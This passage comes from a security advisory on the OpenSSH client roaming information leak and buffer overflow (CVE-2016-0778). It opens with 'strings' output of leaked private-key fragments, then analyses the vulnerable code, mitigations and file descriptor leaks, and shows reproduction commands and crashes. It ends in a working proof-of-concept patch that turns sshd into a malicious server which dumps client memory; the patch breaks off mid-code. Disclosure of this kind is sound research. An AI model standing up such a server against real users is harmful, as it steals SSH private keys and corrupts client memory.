/tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings /tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings /tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250 fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252 packet_backup_state();\n253 /* TODO Perhaps we should read from tty here */\n254 while ((c = fgetc(stdin)) != EOF) {\n... \n259 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260 continue;\n261\n262 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265 options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266 packet_restore_state();\n... \n268 fprintf(stderr, \"[connection resumed]\\n\");\n... \n270 return 0;\n271 }\n272\n273 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275 }\n276 fprintf(stderr, \"[exiting]\\n\");\n... \n278 exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n cached locally, but packet_write_poll() calls roaming_write(), which\n may assign new values to connection_in and connection_out (if a\n reconnection occurs), and client_wait_until_can_do_something()\n subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n following FD_ISSET() uses a new, updated file descriptor (the fd\n connection_out), but an old, out-of-date file descriptor set (the\n fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n first calloc()ates setp, a file descriptor set for connection_in;\n next, it loops around memset(), FD_SET(), select() and roaming_read();\n last, it free()s setp and returns. Unfortunately, roaming_read() may\n reassign a higher value to connection_in (if a reconnection occurs),\n but setp is never enlarged, and the following memset() and FD_SET()\n may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052 fd_set *setp;\n.... \n1058 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059 NFDBITS), sizeof(fd_mask));\n.... \n1065 for (;;) {\n.... \n1075 if (type != SSH_MSG_NONE) {\n1076 free(setp);\n1077 return type;\n1078 }\n.... \n1083 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084 NFDBITS) * sizeof(fd_mask));\n1085 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092 for (;;) {\n.... \n1097 if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098 NULL, NULL, timeoutp)) \u003e= 0)\n1099 break;\n.... \n1115 }\n.... \n1117 do {\n.... \n1119 len = roaming_read(active_state-\u003econnection_in, buf,\n1120 sizeof(buf), \u0026cont);\n1121 } while (len == 0 \u0026\u0026 cont);\n.... \n1130 }\n1131 /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n basically similar to packet_read_seqnr() and may overflow its own setp\n if roaming_write() (called by packet_write_poll()) reassigns a higher\n value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742 fd_set *setp;\n.... \n1746 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747 NFDBITS), sizeof(fd_mask));\n1748 packet_write_poll();\n1749 while (packet_have_data_to_write()) {\n1750 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751 NFDBITS) * sizeof(fd_mask));\n1752 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758 for (;;) {\n.... \n1763 if ((ret = select(active_state-\u003econnection_out + 1,\n1764 NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765 break;\n.... \n1776 }\n.... \n1782 packet_write_poll();\n1783 }\n1784 free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n packet_restore_state(), but introduce a bug that prevents the buffer\n overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n two local pointers, ssh and backup_state, instead of swapping the two\n global pointers active_state and backup_state:\n\n 9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241 ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247 ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271 struct ssh *backup_state)\n2272 {\n2273 struct ssh *tmp;\n.... \n2279 if (backup_state)\n2280 tmp = backup_state;\n2281 else\n2282 tmp = ssh_alloc_session_state();\n2283 backup_state = ssh;\n2284 ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293 struct ssh *backup_state)\n2294 {\n2295 struct ssh *tmp;\n.... \n2299 tmp = backup_state;\n2300 backup_state = ssh;\n2301 ssh = tmp;\n2302 ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n As a result, the global pointer backup_state is still NULL when passed\n to ssh_packet_restore_state(), and crashes the OpenSSH client when\n dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n This bug prevents the buffer overflow from being exploited, but not\n the information leak, because the vulnerable function resend_bytes()\n is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n systems, of which 24 bytes (or 192 file descriptors) are reserved for\n setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n or connection_out has to be increased by hundreds in order to overflow\n setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 106 int sp[2], sock;\n ... \n 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114 fatal(\"Could not create socketpair to communicate with \"\n 115 \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161 close(sp[0]);\n ... \n 164 if ((sock = mm_receive_fd(sp[1])) == -1)\n 165 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171 /* Set the connection file descriptors. */\n 172 packet_set_connection(sock, sock);\n 173\n 174 return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n through a single socket received from the ProxyCommand: the two file\n descriptors connection_in and connection_out are both equal to this\n socket\u0027s file descriptor. \n\n In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n the old socket is close()d by packet_backup_state(), reused for sp[0]\n in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n again for the new socket: the new file descriptors connection_in and\n connection_out are equal to this old, low-numbered file descriptor,\n and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n the Information Leak section, the method ssh_proxy_fdpass_connect()\n calls fatal() before it returns to wait_for_roaming_reconnect(), and\n is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184 int pin[2], pout[2];\n ... \n 192 if (pipe(pin) \u003c 0 || pipe(pout) \u003c 0)\n 193 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194 strerror(errno));\n ... \n 240 /* Close child side of the descriptors. */\n 241 close(pin[0]);\n 242 close(pout[1]);\n ... \n 247 /* Set the connection file descriptors. */\n 248 packet_set_connection(pout[0], pin[1]);\n 249\n 250 /* Indicate OK return */\n 251 return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n agent that does not offer any private keys, the reference to agent_fd\n is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200 int agent_fd, i, r, found;\n.... \n1247 if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249 debug(\"%s: ssh_get_authentication_socket: %s\",\n1250 __func__, ssh_err(r));\n1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253 debug(\"%s: ssh_fetch_identitylist: %s\",\n1254 __func__, ssh_err(r));\n1255 } else {\n.... \n1288 authctxt-\u003eagent_fd = agent_fd;\n1289 }\n.... \n1299 }\n\n However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n (because of the NULL-pointer dereference discussed in the Mitigating\n Factors of the Buffer Overflow section) and are immune to the setp\n overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n client (it is disabled by default), a malicious SSH server can request\n hundreds of forwardings, in order to increase connection_in (each\n forwarding opens a file descriptor), and thus overflow setp in\n packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n packet_write_wait(), but agent forwarding and X11 forwarding are post-\n authentication functionalities, and post-authentication calls to\n packet_read() or packet_read_expect() are scarce, except in the\n key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n effectively forces a rekeying in order to overflow setp in\n packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n may return EAGAIN (EAGAIN is never returned without the reconnection,\n because the preceding call to select() guarantees that connection_in\n is ready for read()). Our proof-of-concept works around this problem\n by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n allowing data to reach the client before roaming_read() is called,\n thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int(); /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+ const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+ void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = 